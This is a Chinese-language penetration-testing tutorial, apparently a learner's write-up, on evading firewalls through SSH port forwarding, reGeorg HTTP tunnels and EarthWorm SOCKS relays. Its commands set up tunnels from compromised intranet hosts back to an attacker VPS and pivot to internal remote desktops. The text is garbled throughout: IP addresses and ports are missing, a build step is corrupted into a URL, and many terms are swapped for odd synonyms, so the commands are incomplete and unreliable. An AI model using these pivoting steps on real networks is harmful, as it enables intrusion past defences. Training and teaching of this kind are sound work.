内网渗透测试：隐藏通讯隧道手艺（上）

　　在现实的 *** 中，通常会通过种种界限装备、软/硬件防火墙甚至入侵检测系统来检查对外毗邻情形，若是发现异样，就会对通讯举行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏障的通讯方式。防火墙两头的数据包通过防火墙所允许的数据包类型或端口举行封装，然后穿过防火墙，与对方举行通讯。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到响应服务器上。

　　上一节中，我们解说了 *** 层的隧道手艺（IPv6 隧道、ICMP 隧道）和传输层的隧道手艺（TCP 隧道、UDP 隧道、通例端口转发）。现如今，TCP、UDP 通讯大量被防御系统阻挡，传统的Socket隧道也已经濒临镌汰，DNS、ICMP、HTTP/HTTPS 等难以被禁用的协议已经成为了攻击者控制隧道的主要渠道。在这一节中，我们将对应用层的隧道 SOCKS 署理手艺举行实验性的解说，由于小编能力太菜，许多东东也是现学现卖，应用层的DNS隧道我会在未来专门写一个专题举行解说。

　　应用层（Application layer）是七层OSI模子的第七层。应用层直接和应用程序接口并提供常见的 *** 应用服务。应用层的隧道手艺主要行使应用软件提供的端口来发送数据，常用的协议有SSH、HTTP/HTTPS和DNS。这里我们主要解说SSH和HTTP/HTTPS，DNS隧道我会在未来专门写一个专题举行解说。

　　SSH协议

　　SSH 为确立在应用层基础上的平安协议，专为远程登录会话和其他 *** 服务提供平安性的协议。行使 SSH 协议可以有用防止远程管理历程中的信息泄露问题。SSH最初是UNIX系统上的一个程序，厥后又迅速扩展到其他操作平台。SSH客户端适用于多种平台，险些所有UNIX平台—包罗HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix，以及其他平台，都可运行SSH。

　　一样平时情形下，SSH协议的传输是被允许通过防火墙及界限装备的，且SSH传输历程加密，很难区分是正当的SSH会话照样攻击者确立的隧道，以是经常被攻击者所行使。攻击者使用SSH隧道突破防火墙限制后，能够确立一些之前无法确立的TCP毗邻。

　　SSH 下令

　　ssh 用户名@ip -p <端口号>端口号>

　　建立ssh隧道常用的参数有：

　　-C：压缩传输，提高传输速率

　　-f：将ssh传输转入后台执行，不占用当前的shell

　　-N：静默毗邻，毗邻后看不到详细会话

　　-g：允许远程主机毗邻内陆用于转发的端口

　　-L：内陆端口转发

　　-R：远程端口转发

　　-D：动态转发（SOCKS 署理）

　　-p：指定ssh端口

　　内陆转发实验

　　测试环境：

　　攻击者vps

　　模拟外网IP：..1.

　　内网web服务器

　　模拟外网IP：..

　　内网IP：..52.

　　内网受害机Windows Server 8

　　内网IP：..52.

　　攻击者vps可以接见内网web服务器，但不能接见内网受害机Windows Server 8；内网web服务器与内网受害机Windows Server 8可以互访。我们的思绪是：以Web服务器为跳板，接见Windows Server 8的端口。行使的条件是已经拿到了明文密码。

　　在攻击者vps上面执行：

　　ssh -CfNg -L (vps端口) : ..52.(目的机ip) : (目的端口) root@..1.(跳板机)

　　//攻击者vps自动去连web

　　-L：内陆端口转发

　　执行以下下令，查看内陆端口是否已经确立毗邻。可以看到，在举行内陆映射时，内陆的ssh历程监听了端口。

　　这里的原理是，以web服务器..1.为跳板，将内网Windows Server 8（..52.）的端口映射到了攻击者vps的端口上，我们执行如下下令，接见vps内陆端口，就可以接见内网Windows Server 8（..52.）的端口了：

　　rdesktop .0.0.1:

　　可以看到，乐成连上了内网Windows Server 8的远程桌面。这种方式只需要在攻击机执行一条下令，照样对照利便的。

　　远程转发实验

　　

　　照样相似的测试环境，但此时内网中没有了界限装备，以是攻击者vps不能接见内网中的这三台机械；内网web服务器可以接见外网vps，windows server 8和域控制器都不能接见外网vps。我们的思绪是：通过外网vps接见内网windows server 8的端口。

　　在web服务器（..52.）上执行如下下令，

　　ssh -CfNg -R (vps端口):..52.(目的机ip):(目的端口) root@..1.(vps)

　　// 受害机自动毗邻vps

　　-R：远程端口转发

　　vps上面可见：

　　这里，我们以web服务器为跳板，将vps的端口的流量转发到了内网windows server 8（..52.）的端口上，我们接见vps的端口，即可接见内网windows server 8的端口远程桌面了：

　　动态转发实验

　　前面先容的端口转发类型都叫静态端口转发，所谓的 “静态” 是指应用程序服务器端的 IP 地址和监听的端口是牢固的。试想另外一类应用场景：设置浏览器通过端口转发接见差别 *** 中的网站。这类应用的特点是目的服务器的 IP 和端口是未知的而且总是在转变，建立端口转发时不可能知道这些信息。只有在发送 HTTP 请求时才气确定目的服务器的 IP 和端口。在这种场景下静态端口转发的方式是搞不定的，因而需要一种专门的端口转发方式，即 “动态端口转发”。SSH 动态端口转发是通过 Socks 协议实现的，建立动态端口转发时 SSH 服务器就类似一个 Socks 署理服务器，以是这种转发方式也叫 Socks 转发。

　　测试环境如下：

　　

　　我们在vps上面执行如下下令，确立一个动态的SOCKS署理通道，

　　ssh -CfNg -D root@..1.(内网web)

　　这里，下令中不需要像前两个一样指定目的服务器和端口号。执行上面的下令后 SSH 客户端（攻击机vps）就更先监听本机 localhost 的 端口。你可以把本机上浏览器 *** 设置中的 Socks 服务器指定为.0.0.1:。然后浏览器中的请求会被转发到 SSH 服务端（内网web服务器），并从 SSH 服务端与目的站点机械（内网文件服务器）确立毗邻举行通讯。

　　

　　可以看到，在使用动态映射的时刻，内陆主机的ssh历程监听了端口。我们在攻击者vps上面打开浏览器，举行设置，设置署理 *** ：

　　这样，就可以通过浏览器接见内网文件服务器了：

　　这里的动态端口转发实在就是确立一个ssh加密的SOCKS署理通道，SOCKS署理它只是简朴地将一端的系统毗邻到另外一端，把你的 *** 数据请求通过一条毗邻你和目的机械之间的通道，由一端转发到另一端。任何支持SOCKS协议的程序都可以使用这个加密通道举行署理接见。

　　HTTP(S) 协议

　　HTTP协议即超文本传输协议，是Internet上行信息传输时使用最为普遍的一种异常简朴的通讯协议。部门局域网对协议举行了限制，只允许用户通过HTTP协议接见外部网站。HTTP Service 署理用于将所有的流量转发到内网。

　　reGeorg

　　下载地址：https://github.com/sensepost/reGeorg

　　首先我们需要明了正向署理和反向署理的区别：

　　正向署理(Forward Proxy)

　　Lhost－－gt;proxy－－gt;Rhost

　　Lhost为了接见到Rhost，向proxy署理服务器发送了一个请求而且指定目的是Rhost，然后proxy向Rhost转交请求并将获得的内容返回给Lhost，简朴来说正向署理就是proxy取代了我们去接见Rhost。

　　反向署理（reverse proxy）

　　Lhostlt;－－gt;proxylt;－－gt;firewalllt;－－gt;Rhost

　　和正向署理相反，Lhost只向proxy发送通俗的请求，详细让他转到那里，proxy自己判断，然后将返回的数据递交回来，这样的利益就是在某些防火墙只允许proxy数据收支的时刻可以有用的举行穿透。

　　简朴说就是正向署理是指攻击机自动通过署理来接见目的机械，反向署理是指目的机械通过署理举行自动毗邻。我们平时使用的reDuh、tunna，和reGeorg一样，都是正向署理。一样平时都是用户上传一个署理剧本到服务器端，内陆的程序去毗邻服务器上的剧本，剧本程序做署理转发端口和流量。

　　reGeorg是reDuh的升级版，主要功效是将内网服务器端口的数据通过HTTP(S)隧道转发到本机，实现基于HTTP协议的通讯。

　　

　　测试环境如下：

　　

　　内网有三台主机，其中web服务器有两个网卡，划分毗邻内外网，其余内网两台主机无法与外网通讯，但可以与web服务器win7互访；攻击者vps可以接见web服务器。我们的思绪是行使HTTP Server 署理，将攻击者所有流量转发到内网中，实现对内网其余主机的控制。

　　将reGeorg的对应剧本文件tunnel.nosocket.php，此时攻击机接见远程服务器上的tunnel.jsp文件，页面返回“Georg says, 'All seems fine'”后，攻击机kali在内陆用reGeorgSocksProxy.py剧本监听内陆的端口，即可确立一个通讯链路。

　　操作时将tunnel.(aspx|ashx|jsp|php)上传到目的Web服务器，详细取决于远程服务器支持什么样的语言。我这里是php服务器，以是我们上传tunnel.nosocket.php，php这里分为有socket与无socket的，tunnel.php需要使用dl()函数加载socket模块，其需要修改php.ini，以是我们使用的是tunnel.nosocket.php。

　　

　　然后攻击者执行：

　　python reGeorgSocksProxy.py -u http://..1.7/tunnel.nosocket.php -p

　　

　　程序卡在“Georg says, 'All seems fine'”示意正常运行。

　　接下来安装并设置proxychains-ng

　　git clone https://github.com/rofl0r/proxychains-ng.git

　　cd proxychains-ng

　　http:///hkjs/configure

　　make amp;amp; make install

　　cp http:///hkjs/src/proxychains.conf /etc/proxychians.conf

　　cd .. amp;amp; rm -rf proxychains-ng

　　编辑proxychains设置文件：

　　vim /etc/proxychains.conf

　　在末尾添加

　　socks5 .0.0.1 // 为你自己的端口，需要与reGeorg中设置的端口相同

　　

　　现在就可以在攻击者vps内陆机械上使用proxychains对应用程序举行署理来接见目的内网中的资源了，使用方式即在工签字前面加上proxychains4，如nmap通过proxychains署理扫描内网windows server 8主机的端口：

　　proxychains4 nmap ..52. -Pn -sT -p // -Pn和-sT必须带着

　　（可以瞥见设置署理的shell内里有数据传输）

　　接下来打开内网windows server 8主机的远程桌面：

　　proxychains4 rdesktop ..52.

　　乐成。固然windows系统可以使用SocksCap等工具举行署理：

　　

　　应用层的隧道另有有一个主要的手艺就是DNS隧道手艺，由于小编能力太菜，~~呜呜呜~~，许多器械也是现学现卖，以是我将在未来专门写一个专题来对其举行先容。

　　Socks署理即万能署理，就像有许多跳线的转接板，它只是简朴地将一端的系统毗邻到另外一端。支持多种协议，包罗http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型，socks 4只支持TCP协议而socks 5支持TCP/UDP协议，还支持种种身份验证机制等协议。其尺度端口为。socks署理响应的接纳socks协议的署理服务器就是SOCKS服务器，是一种通用的署理服务器。行使SOCKS能够与目的内网计算机举行通讯，制止多次使用端口转发。

　　常见的 *** 场景有如下三类：

　　服务器在内网中，可以随便接见外部 *** 。

　　服务器在内网中，可以接见外部 *** ，但服务器安装了防火墙来拒绝敏感端口的毗邻。

　　服务器在内网中，对外只开放了部门端口（例如80端口），且服务器不能接见外部 *** 。

　　EarthWorm

　　下载链接：https://github.com/rootkiter/EarthWorm

　　https://codeload.github.com/idlefire/ew/zip/master

　　EW 是一套便携式的 *** 穿透工具，具有 SOCKS v5服务架设和端口转发两大焦点功效，可在庞大 *** 环境下完成 *** 穿透。EarthWorm能够以“正向”、“反向”、“多级级联”等方式买通一条 *** 隧道，直达 *** 深处，用蚯蚓独占的手段突破 *** 限制，给防火墙松土。该工具包中有多个可执行文件，以顺应差别的操作系统（Linux、Windows、Mac OS、ARM-Linux均包罗在内）

　　

　　reGeorg

　　下载地址：https://github.com/sensepost/reGeorg

　　reGeorg的主要功效是将内网服务器的端口通过HTTP(S)隧道转发到本机，形成一个回路。其可以使目的服务器在内网中（或者在设置了端口计谋的情形下）毗邻内部开放端口。reGeorg行使webshell确立一个socks署理举行内网穿透，服务器必须支持 ASPX、PHP、 *** P中的一种。

　　SockCap64

　　下载地址：http://www.sockscap64.com/

　　SockCap64是一款在Windows环境中相当好用的署理软件，其可以使Windows应用程序通过SOCKS署理服务器来接见 *** 。

　　Proxifier

　　下载地址：https://www.proxifier.com/

　　Proxifier也是一款异常好用的全局署理软件，其提供了跨平台的端口转发和署理功效，适用于Windows、Linux、Mac OS平台。

　　ProxyChains

　　下载地址：https://github.com/rofl0r/proxychains-ng

　　http://proxychains.sourceforge.net/

　　ProxyChains是一款可以在Linux下实现全局署理的软件，异常好用，可以使任何应用程序通过署理上网，允许TCP和DNS流量通过署理隧道，支持HTTP、SOCKS 4、SOCK 5类型的署理服务器。

　　下面讲一下这几个工具的详细用法。

　　EW有六种下令花样，划分是ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran。ssocksd下令用于通俗 *** 环境的正向毗邻，rcsocks和rssocks用于反弹毗邻，其他下令用于庞大 *** 环境的多级级联。

　　

　　测试环境：左侧有一个人计算机，为攻击者的计算机，位于攻击者的内网中，攻击者另有一台公网中的vps；右侧是一个受害内网，有三台机械，我们已经控制的web服务器有两个网卡，是毗邻外网和内网的要害节点，内网其他机械之间均不能直接毗邻。

　　（1）正向 SOCKS 5 服务器

　　适用于目的机械拥有一个外网IP地址的情形下，如上图内网web服务器的模拟外网IP为..1.7。在web服务器上面上传对应的ew程序并执行：

　　ew_for_Win.exe -s ssocksd -l

　　这样，就在内网web服务器上面架设了一个端口为的socks署理服务。接下来我们就可以设置proxychains或SocksCap64添加这个socks署理服务器（..1.7）的署理即可。设置proxychains：

　　

　　打开内网Windows server 8的远程桌面：

　　proxychains4 rdesktop ..52.

　　（2）反弹 SOCKS 5 服务器

　　正向 SOCKS 5 服务器适用于目的机械拥有一个外网IP地址的情形下，假设目的机械没有公网IP的情形下，我们怎么接见内网的资源呢？

　　

　　在这个测试环境中，与上一个相似，只是web服务器没有了公网IP，但能上网；VPS是真的公网vps了。

　　在攻击者公网vps上面上传ew_for_linux64并执行：

　　http:///hkjs/ew_for_linux64 -s rcsocks -l -e

　　该下令的意思是在vps上添加一个转接隧道，监听，把内陆端口收到的署理请求转交给端口，这里端口只是用于传输流量。

　　接着，在内网web服务器（..52.）上传ew_for_Win.exe，并执行下令：

　　ew_for_Win.exe -s rssocks -d 39.xxx.xxx. -e

　　

　　该下令的意思是在受害者web服务器上启动SOCKS5服务，并反弹到公网IP地址为39.xxx.xxx.的端口上。此时vps上面显示“rssocks cmd_socket OK!”说明毗邻乐成：

　　现在就可以在攻击者计算机上面设置proxychains或SocksCap64等工具通过接见公网vps（39.xxx.xxx.）的端口来使用内网web服务器上面架设的socks4署理服务了。如我们打开内网文件服务器的远程桌面：

　　proxychains4 rdesktop ..52.

　　（3）二级 *** 环境(a)

　　适用于目的机械拥有一个外网IP地址的情形下。

　　右侧内网A主机有两个网卡，一个毗邻外网（..1.7），另一个只能毗邻内网的B主机，但不能接见内网中的其他主机资源。B主机可以接见内网其他资源，但不能接见外网。假设我们已经获得了A主机和B主机的控制权。

　　我们先将ew上传至B主机上面，并用ssocksd方式启动端口的正向socks署理：

　　ew_for_Win.exe -s ssocksd -l

　　接着，将ew上传至A主机中，并执行下令：

　　ew_for_Win.exe -s lcx_tran -l -f ..52. -g

　　该下令将A主机端口收到的署理请求转发给B主机（..52.）的端口。

　　现在，我们就可以通过接见A主机的公网IP（..1.7）的端口来使用架设在B主机上的socks署理服务了。设置proxychains：

　　

　　用ssh毗邻内网服务器（..52.）：

　　

　　毗邻乐成。

　　（4）二级 *** 环境(b)

　　适才谁人适用于目的机械拥有一个外网IP地址的情形下，假设目的机械没有公网IP的情形下，我们该怎么办呢？

　　如上图环境，A主机既没有公网IP，但能接见外网，也不能接见内网资源，但可以接见内网B主机；内网B主机可以接见内网资源，但不能接见外网。假设我们已经获得了A主机和B主机的控制权限。

　　这里，我们不能像前一种情形那样通接见A主机来使用内网B主机上面架设的socks署理服务，可以通过接见vps来接见B主机上面架设的socks服务。

　　我们先在公网vps上传ew，在公网vps上面添加转接隧道，监听端口，并将端口收到的署理请求发送给端口，执行下令：

　　ew_for_linux64 -s lcx_listen -l -e

　　然后将ew上传至内网B（..52.）主机，并行使ssocksd方式启动端口的正向socks署理，执行下令：

　　ew_for_Win.exe -s ssocksd -l

　　最后，将ew上传到内网A主机上，在A主机（..52.）上行使lcx_slave方式，将公网vps的端口与内网B主机（..52.）的端口毗邻起来，执行下令：

　　ew_for_Win.exe -s lcx_slave -d 39.xxx.xxx. -e -f ..52. -g

　　此时，就可以设置proxychains等署理工具，通过接见公网vps的端口来使用架设在内网B主机上的socks署理服务了。如下设置proxychains：

　　接见内网机械（..52.）的远程桌面：

　　接见乐成。除了proxychains，我们还可以使用proxifier、sockscap64等署理工具。如下，我们使用sockscap64来接见内网机械。

　　打开，sockscap64，将你想要举行署理的应用程序添加进去（方式很简朴，找到可执行文件后拖进去即可），这里我把远程桌面程序添加了进去

　　

　　点击上面的“署理”，进去添加一个署理，设置好vps或署理服务器的IP和指定的端口。

　　添加好后点击右下角“保留”。回到主界面，点击谁人“闪电”形状的按钮，测试署理服务器能否正常毗邻

　　正常毗邻后，右击远程桌面程序，选择“在署理隧道中运行选中程序”，就可以接见内网远程机械了

　　

　　同样的方式，我们也可以用浏览器来接见内网的资源，好比我们接见内网服务器..52.上面的资源：

　　

　　参考：

　　https://blog.csdn.net/Kris__zhang/article/details/

　　https://www.tuicool.com/articles/JNRn6nY

　　http://rootkiter.com/EarthWorm/

　　《内网平安攻防：渗透测试实战指南》

　　

　　笔者尚为正在入门的小白一枚，文中若有不当之处，还请列位大佬多多指点，小生还需多向先辈们学习！